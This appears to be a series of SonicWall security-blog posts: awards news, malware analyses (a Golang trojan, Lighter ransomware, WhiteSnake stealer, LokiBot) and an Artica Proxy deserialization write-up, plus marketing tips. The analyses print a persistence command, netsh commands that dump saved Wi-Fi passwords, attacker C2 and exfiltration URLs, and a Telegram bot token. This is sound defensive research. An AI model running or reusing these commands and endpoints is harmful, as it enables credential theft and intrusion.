Kicking Off Another Winning Year

The past year has been filled with wins here at SonicWall. We revamped our SecureFirst Partner Program, made important additions to the SonicWall family in Solutions Granted and Banyan, and triumphed in countless other ways. Perhaps most importantly, we continued to strive for excellence in all we do.

And this isn’t just us singing our own praises — plenty of others have taken note of all the great things happening at SonicWall, and our hard work has paid off. With that, we’re thrilled to announce the awards won by SonicWall and SonicWall leaders for an incredible job in 2023!

SonicWall Corporate Awards

Each year, the CRN Partner Program Guide is looked to by solution and service providers so they can determine which partner programs can provide them with not only the most robust product portfolios, but also the best incentives to help partners be successful. The most esteemed award a company can receive in this category is the 5-Star Award, and we’re happy to announce that SonicWall has been given the 5-Star Award in the 2024 CRN Partner Program Guide.

SonicWall was also named as a finalist in the SC Awards’ Best SME Security Solution category for our TZ Series next-generation firewalls (NGFWs). To cap things off, SonicWall was named to CRN’s 20 Coolest Network Security Companies of 2024 list.

CRN Channel Chiefs

Each year, CRN’s editorial staff names Channel Chiefs based on factors such as professional accomplishments, industry standing and sheer dedication to the channel partner community. This list is reserved for those leaders who are truly making an impact through excellent innovation and strategy in the channel. We’re over the moon to have three such individuals on our team here at SonicWall. Help us congratulate our CRN Channel Chiefs for 2024:

  • Jason Carter, Chief Revenue Officer
  • Michelle Ragusa-McBain, Global Channel Chief
  • Spencer Starkey, Vice President of Sales, EMEA

Michelle Ragusa-McBain

Along with being named a CRN Channel Chief, SonicWall’s Michelle Ragusa-McBain showed exactly why she’s our Global Channel Chief, earning enough awards to have a section of her own:

  • Channel Futures’ 2024 Circle of Excellence
  • Channel Futures’ 2024 Channel Influencer
  • CRN’s Woman of the Year Finalist
  • CRN’s Channel Madness Finalist

Way to go, Michelle!

Looking Ahead

Thank you to all SonicWall team members and partners for your contributions and incredible efforts this past year. Without you all, none of these awards would be possible. We hope to make 2024 even better than 2023, and we’re looking forward to continuing to celebrate our progress and one another!

Here’s to a great year ahead!

New Golang Trojan Installs Certificate for Comms Evasion

Overview

This week, the Sonicwall Capture Labs threat research team analyzed a new Golang malware sample. It uses multiple geographic checks and publicly available packages to screenshot the system before installing a root certificate to the Windows registry for HTTPS communications to the C2. There is currently no malware family affiliated, but the IP and URL addresses have been used by AgentTesla, GuLoader, PureLog Stealer and others.

Technical Analysis

The sample is detected as a Golang 64-bit executable with a WinAuth certificate. The timestamp has been tampered with, as it shows a creation date of December 31, 1969.

Figure 1: Sample detection with Detect It Easy

The certificate listed is issued from ‘RUNNINGWITHSCISSORS LTD’ but does not have an issuer signatory.

Figure 2: There is no signer, email or creation date with this certificate

Looking at the sample, one section included is non-standard, .symtab; this section is associated with ELF/Linux files and should not be on a Windows executable.

Figure 3: This is a Linux file-type section and would not be accessed by normal means

Because of the way Golang compiles binaries, the program had to have the gopcln table reconstructed in order to see the inner workings of the file.

 

Figure 4: Malware functions in cleartext

Once done, there are several items of note. Newly renamed functions list out the primary methods of . The strings show a pattern that looks to be used to send system information to the attacker – this is confirmed later. This pattern contains information for a system UUID, remote IP, username, hostname, Windows version, process ID, process name and architecture.

Figure 5: There is an ASCII pattern for information that may be sent to the attacker

Next, the packages reveal that the author is using public GitHub applications from the following repositories to generate and save screenshots:

Figure 6: These GitHub packages are public and are not malicious on their own

During runtime, the malware will start by querying main system information using process injection via VirtualAlloc and running WMIC. The following two commands are run first:

  • ‘SELECT UUID FROM Win32_ComputerSystemProduct’
  • C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Next, these registry keys are queried for the Windows version and hostname:

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters

When attempting to control/open WMIC, the sample looked in the following locations, as well as trying to find a file with an unusual name:

  • C:\Users\user\Desktop
  • C:\Program Files (x86)\Common Files\Oracle\Java\javapath\
  • C:\Windows
    C:\Windows\system32
  • C:\Windows\Wbem\

Figure 7: Sample of locations WMIC is searched for along with an unusual file

Once WMIC has been launched, both the main executable and WMIC will load, or attempt to load, the following DLLs:

Apphelp.dll
Cryptbase.dll
Winmm.dll
Powrprof.dll
Umpdc.dll
Userenv.dll
Profapi.dll
Netapi32.dll
Wkscli.dll
Netutils.dll
Samcli.dll
Samlib.dll
Iphlpapi.dll
Dhcpcsvc6.dll
Dhcpcsvc.dll
Dnsapi.dll
Mswsock.dll
Rasadhlp.dll
Fwpuclnt.dll
Msasn1.dll
Cryptsp.dll
Rsaenh.dll
Gpapi.dll
Framedynos.dll
Sspicli.dll
Kernel.appcore.dll
Wbemcomm.dll
Msxml6.dll
Urlmon.dll
Iertutil.dll
Srvcli.dll
Uxtheme.dll
Vcruntime140.dll
Vcruntime140_1.dll
Amsi.dll
Vbscript.dll
sxs.dll

The majority of these were not used during testing, which means that they may be used after initial contact is made with the C2 for further data collection or additional malware utilities.

Figure 8: Sample listing of DLLs searched for by the trojan

When the sample reaches out on the network, it attempts to get an IP using ‘ip-api.com/json’ and to make initial contact with the C2 at ‘https://daily-mashriq[.]org/goyxdrkhjilchyigflztv’ using a ping.

Once those steps are complete, the malware installs a new root certificate by overriding data in the following registry key using ‘CertGetCertificateChain’:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8

Figure 9: Previous data being overwritten by the new certificate

Although the main functions go into detail about screenshots, there are also API calls in memory for tracking other Windows events. These are monitored with SetWindowsHookExW and TrackMouseEvent. Screenshots are created using the GitHub packages previously mentioned.

Figures 10, 11: Code showing that the ‘kbinani’ takes the screenshot, then ‘fogleman’ saves it.

Network connection to ‘daily-mashriq[.]org’ is attempted with the previously discovered pattern containing information encoded with chacha20 and sent using User-Agent “AGCYRNRWWWFZZSWWFWDYDCVDN”:

Figure 12: Encoded information sent to the C2

However, after the initial message has attempted to POST, subsequent messages only include the UID and are sent every seven seconds.

Figure 13: Repeated POSTS only contain the UID

The following ports are also bound for listening: 49708-49711, 49720-49730, and 49733-49750.

As of this writing, it appears that the domain has been blocked by (CHECK THIS).

SonicWall Protections

SonicWall Capture Labs provides protection against this threat via the following signature:

  • MalAgent.Go.Trojan

IOCs

  • 8f4cf379ee2bef6b60fec792d36895dce3929bf26d0533fbb1fdb41988df7301
  • https://daily-mashriq.org/goyxdrkhjilchyigflztv
  • http://ip-api.com/json/

Unpatched PHP Deserialization Vulnerability in Artica Proxy

Overview

SonicWall Capture Labs threat research team became aware of a deserialization vulnerability with the Artica Proxy appliance, assessed its impact and developed mitigation measures. Artica Proxy is a comprehensive proxy solution performing tasks such as web filtering and categorization, SSL inspection, and bandwidth management. The vendor reports having over 100K servers installed around the world.

Identified as CVE-2024-2054, the administrative web interface allows the deserialization of any PHP objects provided by users without authentication, thereby allowing code to be executed under the “www-data” user account, earning an expected score of 9.8. This affects version 4.50 and all previous versions. While there are no reports of active exploitation currently, a publicly available PoC is provided by the Korelogic research team, and the vendor has not issued a patch yet. As a result, it is strongly encouraged that organizations follow the steps in the mitigation section below. SonicWall customers are already protected through IPS signature 19786, released on March 18th.

Technical Overview

While unauthenticated, a user can make an HTTP POST request to the “/wizard/wiz.wizard.progress.php” endpoint. This endpoint may receive the “build-js” query parameter as seen in Figure 1.

Figure 1: wiz.wizard.progress.php lines 10-16

While processing the “build-js” user input, it performs a base64 decode operation and then sends the decoded value to the “unserialize” PHP function, as seen in Figure 2.

Figure 2: wiz.wizard.progress.php buld.js function

This is the root cause of the vulnerability, as an unauthenticated attacker can control the base64 encoded input which is then directly deserialized.

Triggering the Vulnerability

To trigger this vulnerability, an attacker must send an HTTP POST request to the Artica Proxy instance with the crafted “build-js” parameter set to a base64-encoded payload. Using the public PoC code as an example, this could be accomplished using the Linux “curl” command, as shown in Figure 3.

Figure 3: Triggering the vulnerability using curl

Exploitation

While triggering the vulnerable code path is simplistic, exploitation is slightly trickier. As with most deserialization attacks, execution is limited to what modules may be installed on the system – in this case, PHP modules. An attacker must leverage these modules meaningfully to achieve the desired execution by deserializing serialized objects. When searching for a suitable object to use within the installed PHP modules, the “Net_DNS2_Cache_File” destructor within the “Net_DSN2” library stands out, as shown in Figure 4.

Figure 4: NET_DNS2_CAHCE_FILE destructor file write

When a “Net_DNS2_Cache_File” object is destroyed, it may write a file to the disk. This indicates that an attacker can leverage creating and destroying this object to write a file to the system.  As PHP web shells are a common tool used by attackers, this is a likely choice for exploitation.

It is worth noting that the possibility of this destructor being leveraged by the attackers was reported in 2016 to the Net_DNS2 project on GitHub, tracked as issue 50.

Figure 5: GitHub Issue reporting vulnerable code

The Net_DNS2 project mitigated the issue several months later in 2016, however, Artica Proxy is using an outdated version of the library, which can be seen in the DNS2.inc file located on the filesystem.

Figure 6: Net_DNS2 class version on Artica Proxy

To illustrate exploitation, Figure 7 shows a segment where an unauthenticated user manages to overwrite the existing “wiz.upload.php” file.  The clip first displays the original “wiz.upload.php” file and then shows the file overwritten by a simple web shell after exploitation.  This is achieved by utilizing a “Net_DNS2_Cache_File” object to embed the web shell, allowing the execution of harmful PHP code under the “www-data” user account.  The payload executes the “whoami” command confirming the user.

Figure 7: Successful exploitation

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS: 19786 Artica Proxy PHP Deserialization

Remediation Recommendations

Unfortunately, no patch is currently available for this vulnerability. It is recommended to either remove the ‘usr/share/article-postfix/wizard’ directory (as it is not a critical component for the proxy to function properly) or move this directory outside of the web root folder. Doing so will make the vulnerable code inaccessible from the network, drastically reducing risk.

Relevant Links

Lighter Ransomware Locks Users Out of System

Overview

This week, the Sonicwall Capture Labs threat research team analyzed a ransomware calling itself Lighter Ransomware. Upon execution, it opens up a window with a countdown timer instructing the victim to reach out immediately before the timer ends – or face greater consequences.

Infection Cycle

The malware arrives as a portable executable that, once executed, immediately displays this warning window.

Figure 1: Lighter ransomware window with countdown.

It lets the user know that they have been infected with ransomware and displays instructions on how to get their files back. Interestingly, this ransomware only asks for $100.

However, most common keyboard shortcuts are blocked, which renders the system unusable once this window is displayed.

Figure 2: Functionality showing keyboard shortcuts being blocked

Common file utilities such as taskmanager, cmd, msconfig, regedit and processxp are blocked.

Figure 3. Functionality showing to kill taskmgr  

Files are then simultaneously encrypted using AES encryption, specifically, the RijndaelManaged class, and the malware adds the .L0cked extension to all encrypted files.

Figure 4: AES encryption functionality using the RijndaelManaged class

Figure 5: Encrypted files with the .L0cked file extension

This ransomware targets files with the following file extensions seen in the screenshot below:

Figure 6: File extensions targeted by this ransomware

Unless the user forces a reboot, they will be unable to do most common tasks while the warning window is displayed.

SonicWall Protections

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Lighter.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and Capture Client endpoint solutions.

WhiteSnake Stealer: Unveiling the Latest Version – Less Obfuscated, More Dangerous

Overview

SonicWall Capture Labs threat research team has observed a new variant of WhiteSnake Stealer. This stealer poses significant risks to users and organizations as it can steal critical sensitive data from compromised systems, including valuable information like web browser data, cryptocurrency wallets and much more. This new version has removed the string decryption code and made the code easy to understand.

Technical Analysis

After executing the file, the stealer verifies whether the mutex is already present to prevent two instances of the stealer from running simultaneously. The mutex value is specified in the stealer’s configuration. If the mutex is detected, the stealer terminates.

Figure 1: Performing mutex check

AntiVM

In this stealer, the AntiVM function is by default disabled (flag is set to 0). If the flag is set to 1 then it checks for the presence of sandboxes by utilizing the WMI (Windows Management Instrumentation) query “SELECT * FROM Win32_ComputerSystem” as we see below. By using this query, the stealer gets “Model” and “Manufacturer” properties and checks any property containing the below mentioned strings.

  • virtual
  • vmbox
  • vmware
  • thinapp
  • VMXh
  • innotek gmbh
  • tpvcgateway
  • tpautoconnsvc
  • vbox
  • kvm
  • red hat
  • qemu

If any of the string is present, then the stealer will exit.

Figure 2: Performing AntiVM check

Following an Anti-VM check, the malware invokes the Create() function, subsequently executing the ProcessCommands() function. This function is tailored to extract sensitive information from various sources, such as web browsers, messaging apps, FTP clients and cryptocurrency wallets, among others. ProcessCommands() function is responsible for stealing information from web browsers (which are listed below) such as “Cookies”, “Autofills”, “Login Data”, “History”, “Network\Cookies” and “Web Data”.

  • Mozilla Firefox
  • Thunderbird
  • Google Chrome
  • YandexBrowser
  • Vivaldi
  • CocCoc Browser
  • CentBrowser
  • Brave Browser
  • Chromium
  • Microsoft Edge
  • Opera
  • OperaGX

Apart from stealing web browser data, WhiteSnake stealer has the capability to grab cryptocurrency wallets and crypto wallet browser extensions. The table below shows the targeted cryptocurrency wallets and browser extensions.

Cryptocurrency Wallets

Cryptocurrency Wallet NameTargeted Directory
Ledger%AppData%\ledger live
Atomic%AppData%\atomic\Local Storage\leveldb
Wasabi%AppData%\WalletWasabi\Client\Wallets
Binance%AppData%\Binance
Guarda%AppData%\Guarda\Local Storage\leveldb
Coinomi%LocalAppData%\Coinomi\Coinomi\wallets
Bitcoin%AppData%\Bitcoin\wallets
Electrum%AppData%\Electrum\wallets
Electrum-LTC%AppData%\Electrum-LTC\wallets
Zcash%AppData%\Zcash
Exodus%AppData%\Exodus
JaxxLiberty%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
JaxxClassic%AppData%\Jaxx\Local Storage\leveldb
Monero%UserProfile%\Documents\Monero\wallets

Table 1: Targeted Cryptocurrency Wallets

Crypto Wallet Browser Extensions

Extension NameBrowser Extension ID
Metamasknkbihfbeogaeaoehlefnkodbefgpgknn
Roninfnjhmkhhmkbjkkabndcnnogagogbneec
BinanceChainfhbohimaelbohpjbbldcngcnapndodjp
TronLinkibnejdfjmmkpcnlpebklmnkoeoihofec
Phantombfnaelmomeimhlpmgjnjophhpkkoljpa

Table 2: Targeted Crypto Wallet Extensions

Persistence

Again, in this version of WhiteSnake stealer persistence mode is disabled by default. If it is enabled, then the stealer creates persistence by copying itself in the %Appdata% directory before deleting the original file and creating a scheduled task to run the stealer every minute, as shown in the command below.

  • /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn “WhiteSnake_Stealer” /sc MINUTE /tr “C:\Users\Administrator\AppData\Local\RobloxSecurity\WhiteSnake_Stealer.exe” /rl LIMITED /f && DEL /F /S /Q /A “C:\Users\Administrator\Desktop\WhiteSnake_Stealer.exe” &&START “” “C:\Users\Administrator\AppData\Local\RobloxSecurity\WhiteSnake_Stealer.exe”

Here, the “RobloxSecurity” folder name is already present in the stealer configuration file.

Figure 3: Stealer code for persistence and deleting itself

Capturing Screenshots

WhiteSnake stealer also has the capability to capture screenshots on the victim’s machine. Some part of the code responsible for this capability is shown in the figure below.

Figure 4: Capturing a screenshot from the victim’s machine

Keylogging

In this version of WhiteSnake stealer, Keylogging functionality is disabled by default. If it becomes enabled or the attacker sends the command “KEYLOGGER”, then it captures the keystrokes of the victim’s machine. To do this task, the stealer needs Windows APIs, which it loads at run time. The APIs are listed here:

  • UnhookWindowsHookEx
  • CallNextHookEx
  • GetKeyState
  • GetKeyboardState
  • GetKeyboardLayout
  • ToUnicodeEx
  • MapVirtualKeyA

Figure 5: Part of the code responsible for keylogging

Microphone

If an attacker sends the command MICROPHONE, then the WhiteSnake stealer first executes the “SELECT * FROM Win32_SoundDevice” WMI query to check whether the microphone is connected to the victim’s machine. If the microphone count is more than ‘0’, then microphone recording is started for a specified amount of time, as shown in the figure below.

Figure 6: Code responsible for microphone recording

Webcam

After stealing the microphone recording, WhiteSnake stealer is also capable of grabbing webcam images. This stealer uses the “SELECT * FROM Win32_PnPEntity WHERE (PNPClass = ‘Image’ OR PNPClass = ‘Camera’)” WMI query. By using above mentioned WMI query, it first gets the count of webcams connected to the victim’s machine. If the count is equal to ‘1’, it tries to capture an image from the webcam and provides the image data as a byte array in PNG format.

Figure 7: Stealing webcam image

Targeting Apps

Again, this stealer can grab information from applications that are installed on the victim’s machine. As shown in the figure below, it is targeting email client applications like Outlook and Foxmail.

Figure 8: Targeting email client applications

Remote Access

Another distinctive characteristic of WhiteSnake stealer is its remote terminal, enabling an attacker to initiate a remote session with the infected machine and execute specific commands, including:

  • UNINSTALL: Ceases operation and removes itself from the system.
  • PING: Executes a ‘ping’-like operation and replies with a ‘pong’.
  • REFRESH: Refresh the log credentials.
  • SCREENSHOT: Takes a screenshot of the victim’s screen.
  • DPAPI: Decrypts encrypted sensitive data stored on the victim’s system.
  • WEBCAM: Capture a photo using the webcam.
  • MICROPHONE: Record sound from victim’s microphone.
  • COMPRESS: Compresses directory into ZIP.
  • DECOMPRESS: Unzips the ZIP contents to the current directory.
  • TRANSFER: Uploads the file to an IP address from the configuration.
  • GET_FILE: Fetches the content of a designated file.
  • LIST_FILES: Lists files in the current directory.
  • LIST_PROCESSES: Get running processes list.
  • PROXY_SETUP: Downloads and expose chosen port.
  • KEYLOGGER: Capture keystrokes.
  • LOADEXEC: Retrieves a file from a distant location and runs it.

Wi-Fi

  • Retrieve Credentials:

The command “chcp 65001 && netsh wlan show profiles|findstr /R /C:\”[ ]:[ ]\”” executed in a Windows command prompt sets the code page to UTF-8 and retrieves Wi-Fi profiles stored on the system and only steals profiles that likely have passwords associated with them. If any such profile is found, then, by using the command “chcp 65001 & netsh wlan show profiles name={0} key=clear | findstr \”Key\””, ssid);” it retrieves the stored profile names and associated passwords. It then decodes this information by Base64 and puts it into the “Apps\\WifiCredentials.txt” file.

  • Retrieve Nearby Networks:

The stealer does not stop after stealing Wi-Fi passwords. Next, it runs the command “chcp 65001 && netsh wlan show networks mode=bssid | findstr \”SSID BSSID Signal\”” to fetch information about available Wi-Fi networks on the compromised user machine focusing specifically on their names (SSID), unique identifiers (BSSID), and signal strength. It stores this information in the “Apps\\WifiNearby.txt” file as shown in the figure below.

Figure 9: Retrieving Wi-Fi credentials

System Information

WhiteSnake stealer gathers the victim’s system information like username, machine name, operating system, tag, IP address, screen resolution, CPU name, graphics info, RAM size, disk size, model, manufacturer and more. Below is a list of WMI queries which stealer uses to fetch the above-mentioned system information.

  • “SELECT * FROM Win32_Processor”, “Name”, “Unknown”
  • “SELECT * FROM Win32_VideoController”, “Name”, “Unknown”
  • “SELECT * FROM Win32_ComputerSystem”, “TotalPhysicalMemory”, “-1”
  • “SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3”
  • “SELECT * FROM Win32_ComputerSystem”, “Model”, “Unknown”
  • “SELECT * FROM Win32_ComputerSystem”, “Manufacturer”, “Unknown”

After collecting almost all system information, it collects all loaded DLL modules, all currently running processes and a list of all installed application names by querying the registry key SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall as shown in the figure below.

Figure 10: Code responsible for stealing processes and loaded DLLs from the victim’s system

Figure 11: Victim’s stolen data converted into XML format

When this process of stealing system information from the victim’s machine is complete, the stealer uses XmlSerializer class to serialize stolen information into XML format. After serialization, it compresses the same information and encrypts it using an RC4 encryption algorithm with a randomly generated key. The key is generated using the RNGCryptoServiceProvider() method.

Figure 12: Performing RC4 and RSA encryption

It is noteworthy that when the attacker has the RC4 + RSA encryption option enabled (by default), then the RC4 key is encrypted with RSA encryption, and the RSA public key is stored in the configuration.

Figure 13: RSA Public Key

Data Exfiltration

WhiteSnake stealer tries to send the victim’s stolen information to the attacker’s C&C, which is already present in the stealer’s binary. First, it appends Base64 encoded stolen information like username, country and more to C&C and makes a complete URL. Here is an example:

hxxp://45.61.137.41:8080/sendData?pk=MDE0RTc3QkZFM0Q4QjI3NkI5NjNFNjgyNUREQTZBNjk=&ta=RGVmYXVsdA==&un=WW9nZXNo&pc=V0lOLUs5NzNHTk9RSzBB&co=SW5kaWE=&wa=MA==&be=MA==}

Figure 14: Trying to exfiltrate stolen information

Since this URL is down while writing this blog post, function SendC2() returns false. After this, the stealer creates a WSR file. This filename begins with five random characters followed by _username`, @computername and _report. The WSR is the file containing the exfiltrated data.

Here is an example of a WSR file name generated this way:

fTdXL_administrator@WIN-K973GNOQK0A_report.wsr

After this, the stealer again tries to upload the WSR log file to one of the servers listed in the configuration file. If a server is unavailable and the web request fails, the stealer attempts the next IP address on the list as shown below.

Figure 15: Trying to exfiltrate the WSR log file

Figure 16: Data exfiltration using PUT request

After successfully exfiltrating stolen information from the victim’s system to one of the attacker’s IP addresses,  the stealer attaches tags like OS version, country, username, computer name, the exfiltration file size and the IP where the data is being sent to and sends the data to this Telegram bot URL:

hxxps://api[.]telegram[.]org/bot6889064496:AAHoMJK9ptSrhXHFUPG4rXCObxc34Q3oqzY/sendMessage?chat_id=1914807690.

Figure 17: Sending stolen information to Telegram Bot

SonicWall’s RTDMI engine detected this threat.

Indicators of Compromise (IOCs)

SHA256: 94048358360fd46766cdf1d4f487c1c61a391f97ebc10704c388170ae4e66b88

Nine Cybersecurity Best Practices for Local Governments

In its 2024 Cyber Threat Report, SonicWall found an alarming rise in malicious intrusion attempts and malware attacks, underscoring the heightened vulnerability of local governments. A common predicament compounds this situation: Many municipalities are under-resourced, struggling to equip their teams with the necessary staff, training, education and technology to counter these diverse and sophisticated threats effectively.

As local governments navigate the complex cybersecurity landscape, it’s crucial to lay a strong foundation. This blog outlines nine best practices local governments should implement to enhance their cybersecurity measures. With careful planning, thorough diligence and innovative strategies, these recommendations provide a roadmap for building robust protection against cyber threats.

1. Have a Plan

It’s critically important to have a plan encompassing the basic, foundational and organizational controls to protect, detect and respond to cyber incidents. Organizations like the Cybersecurity and Infrastructure Security Agency (CISA) offer resources for state, local, tribal and territorial governments that include more best practices, along with case studies to help government IT teams recognize and address cybersecurity risks.

2. Leverage the Resources of the NIST

The National Institute of Standards and Technology (NIST) offers invaluable resources for managing cybersecurity risks. The NIST’s cybersecurity framework is based on five pillars — identify, protect, detect, respond and recover — and is accompanied by online modules, examples, FAQs and more, all available for free.

3. Get Insurance

A robust risk mitigation policy includes the understanding that cyber liability insurance is increasingly essential. Policies covering privacy liability, network interruption, and errors and omissions provide financial safeguards and peace of mind during a data breach. But do your homework— the requirements and costs of these policies continue to snowball.

4. Thoroughly Assess Your Processes

Commit to periodically evaluating your organization’s cybersecurity posture and training efforts. Initiating your cybersecurity journey requires a thorough review. This assessment helps uncover critical gaps and provides a baseline for future progress monitoring.

Expensive external evaluations aren’t always necessary: Free resources such as the Department of Homeland Security’s Infrastructure Survey Tool and Cyber Resilience Review offer valuable insights and can help you identify and document the cyber resilience of a facility. The CISA Cybersecurity Evaluation Tool (CSET) is a user-friendly desktop application that can help you assess the security posture of your cyber systems and networks.

5. Stick to the Basics

Simple, tried-and-true measures can significantly fortify your defenses. Regular software updates — preferably automated — are fundamental, and having secure backups of sensitive digital and physical files is crucial. Follow cybersecurity leaders when it comes to best practices for password protection. Set a firm cybersecurity policy for all organization members (from leadership to staff) to ensure that all personnel follow policy and that their connected devices comply with standard security methods like data encryption and multi-factor authentication (MFA).

6. Train, Retrain and Train Some More

In the report “Cost of a Data Breach,” the Ponemon Institute highlights human error as a leading cause of network security breaches. Periodic comprehensive staff training in cybersecurity is non-negotiable, ensuring every organization member can identify, mitigate and respond effectively to threats. It’s critical to tell them, tell them again, and then tell them what you told them. Adopt a mindset that cybersecurity is everyone’s business.

7. Offer Internships

The cybersecurity skills gap continues to be a concern — specifically, expertise in cloud computing, zero trust and AI/machine learning. States and municipalities have a unique collaboration opportunity with local colleges, universities and nonprofits that can offset the financial burden of enhancing cybersecurity infrastructure. For instance, contact a local college or university for young talent who want real-world experience outside the classroom. Here’s your opportunity to build partnerships that can yield technical assistance and build relationships in the community, while also nurturing future industry talent.

8. Keep Up

Cybersecurity is not a one-and-done issue. It’s constantly evolving based on factors ranging from law enforcement activity to technological advancements. Hackers now work in semi-corporate environments with access to shared (and often paid) services to extend their reach.

As we build out AI for its societal benefits, cybercriminals are implementing AI to drive breach activity. To help you stay informed, pick a handful of government resources, journals and bloggers like SonicWall’s network security experts to help you keep up to date in this rapidly moving threat environment.

9. Outsource SecOps

Outsourcing is an option for your high-level cybersecurity operations and deployments. A recent survey by the ICMA (International City/County Management Association) on the state of cybersecurity in municipalities in the United States found that more than half (about 50.9%) of local governments are now outsourcing many cybersecurity operations.

Why outsource? Nurturing and maintaining in-house specialized skills is complex and can be cost prohibitive. SonicWall’s partner network encompasses hundreds of professionally trained Managed Service Providers (MSPs) and Managed Security Service Providers (MSSPs) that can assist in developing and rolling out a comprehensive cybersecurity solution. Contact SonicWall’s local government team for assistance in selecting one for your organization.

Next Steps for Cybersecurity

In the dynamic world of cyber threats, local governments must remain vigilant and adaptable. By embracing these best practices and staying abreast of new developments, you can build a robust defense against a spectrum of cyber threats. Enhancing cybersecurity can be daunting — especially for resource-strapped municipalities — but local governments can improve cybersecurity by being proactive, educated and resourceful. This proactive approach is not just about safeguarding data and infrastructure; it’s about protecting the trust and well-being of the communities we serve.

We can tailor a solution for almost any government use case. Contact us to learn more.

5 Strategies for Thoughtful K-12 Network Infrastructure Upgrades

Technology and education haven’t always gone hand in hand. Just a decade ago, many schools had completely banned technologies like smartphones, tablets, laptops and more. But the classrooms of 2024 have done a complete 180: You’d now be hard-pressed to find a classroom that isn’t utilizing some form of tablet or laptop in its curriculum. In these new high-tech classrooms, admins and IT leaders need best practices and strategies for securing classrooms against ever-increasing cyberattacks.

This seismic technological shift has come with a new set of challenges, from making sure students have their tech charged and ready to go each day to securing on-campus and remote networks to make sure students can safely connect from anywhere. Wi-Fi and remote access points are now the primary methods for connection, but despite that, the network infrastructure at many schools still leaves a lot to be desired.

In the past, some schools haven’t undertaken such updates until after network infrastructure is compromised, resulting in both steep financial losses and loss of valuable instruction time. Proactive upgrades to safer, higher-performing technologies are the path forward, and SonicWall is ready to help you make that path easier.

Density Planning

Traditionally, Wi-Fi network planning focused on coverage, but when planning for efficiency, coverage isn’t enough. Even if a classroom’s wireless signal covers the whole area, it may still need help keeping up with the number of devices that students and faculty are using.

School leaders should be planning for the maximum traffic density in each classroom and across the entire campus. This ensures that students, faculty and visitors are always covered, and helps prevent issues caused by low bandwidth. Tools like the SonicWall Wi-Fi Planner can help IT leaders visualize and plan for maximum device density and traffic across their environment.

Embracing Cloud Technology

Many school applications and functions have transitioned to the cloud to save valuable server space and increase access. But managing cloud applications can be difficult and even confusing. Cloud-managed wireless solutions, like SonicWall’s Wi-Fi Cloud Manager (WCM), offer centralized management and easy access through the SonicWall Capture Security Center (CSC).

With WCM and CSC, you can manage tens of thousands of wireless access points and a variety of networks. Cloud App Security (CAS) can be easily deployed in a matter of minutes and leverages machine learning, artificial intelligence and big data analysis to catch email-borne and zero-day attacks that can be easily missed by your cloud provider. CAS stops business email compromise, phishing, malware and account takeover attacks, and even combats against insider threats.

Unified Management System

Deploying so many technologies often means juggling multiple different management software applications, gunking up processes and taking valuable time away from school IT leaders. Choosing to implement a cohesive ecosystem with a unified management system can save money and time while simplifying management. A tool like SonicWall Capture Security Center (CSC) offers a single-pane-of-glass management system, and its unified view of your entire network and real-time analytics enhance network security and efficiency. CSC also streamlines network governance by integrating various security resources into one easy-to-use dashboard.

Content Filtering and Advanced Licensing Implementation

Any time you turn kids loose with internet-connected devices, they’re bound to test the limits of what they can and can’t get away with. Teachers and other faculty don’t have the bandwidth to constantly monitor everything students are doing – but SonicWall’s Content Filtering Service (CFS) does. Content filtering is crucial for all school networks, and provides protection from harmful and inappropriate online content that students may stumble upon. SonicWall’s CFS offers an extensive database for creating custom access policies that enhance online safety.

SonicWall’s Gen 7 next-generation firewalls (NGFWs) also support advanced networking features like SD-WAN, robust content filtering, dynamic routing, high availability and high-speed VPN functionality. Like the other tools we’ve mentioned here, these appliances provide a single-pane-of-glass interface to manage both switches and access points.

Future-proofing with Advanced Technology

Deploying the latest technology not only provides you with the most up-to-date and advanced protection, but it’s also the key to creating a sustainable and efficient network. Schools don’t need to completely overhaul what they have in place right now – they just need to implement thoughtful upgrades to critical components.

Upgrading things like wireless access points that support the latest standards like multi-gigabit 802.3ax, advanced firewall services, cloud protection and endpoint control helps you ensure that your network security is robust, efficient, and equipped to deal with the constantly evolving threat environment that plagues schools today.

Maximizing Impact and Value for K-12 Education

Advanced network solutions are the path forward in K-12, and the educational community as a whole must embrace these solutions in order to provide consistent and accessible digital experiences for students, staff and visitors. Tools like SonicWall’s Capture Security Center (CSC) can ensure the safety of your network in a package that’s easy to manage. And the adoption of 802.11ax for campus Wi-Fi can prepare your infrastructure for future technological advancements.

Beginning this upgrade path now provides benefits both for the present and future, all while fostering a learning environment where technology is seamlessly and safely integrated. The result will be a network that’s efficient and secure, and will be simpler and more cost-effective to upgrade in the future.

LokiBot is Being Distributed by Windows Shortcut Files

Overview

The SonicWall RTDMI ™ engine has recently detected Windows Shortcut Files (LNKs) inside archives that execute LokiBot malware on the victim’s machine. The malicious LNK file is packed inside an archive along with a text file that says, “Find attached March Order” in Spanish, essentially pretending to be a legitimate file. The LNK file executes a PowerShell script to download and execute the LokiBot loader executable from a URL. LokiBot malware has been observed using image steganography, multi-layered packing and Living Off the Land (LOTL) techniques in past campaigns. The malware authors’ trend of using a low-profile file type as an initial vector keeps increasing, and they prefer the use of custom packers and protectors to prevent detection rather than updating the core executable code.

Figure 1: LNK file executing PowerShell to download LokiBot

Loader Executable

The downloaded executable is protected in two layers by the Confuser application to make the analysis difficult for the reversing engineers. After unpacking and de-obfuscating both of the layers, the actual code that is responsible for loading and executing the LokiBot executable is exposed. The LokiBot binary is kept RSA-encrypted and Base64-encoded in the resource of the loader executable, which is only visible after unpacking.

Figure 2: Encrypted LokiBot executable in the resource of loader executable

To get the RSA key, the malware computes MD5 of the string “UV?vgotlHR?P\Y?LEhgU]CdJIS?W;yBTkDZw??FTEi>Z” and self-concatenates the MD5 value by overwriting the last byte of the MD5. After doing Base64 decoding, the malware decrypts the encrypted executable data using an RSA algorithm with the below parameters:

Figure 3: Parameters

Figure 4: Code performing RSA decryption

 

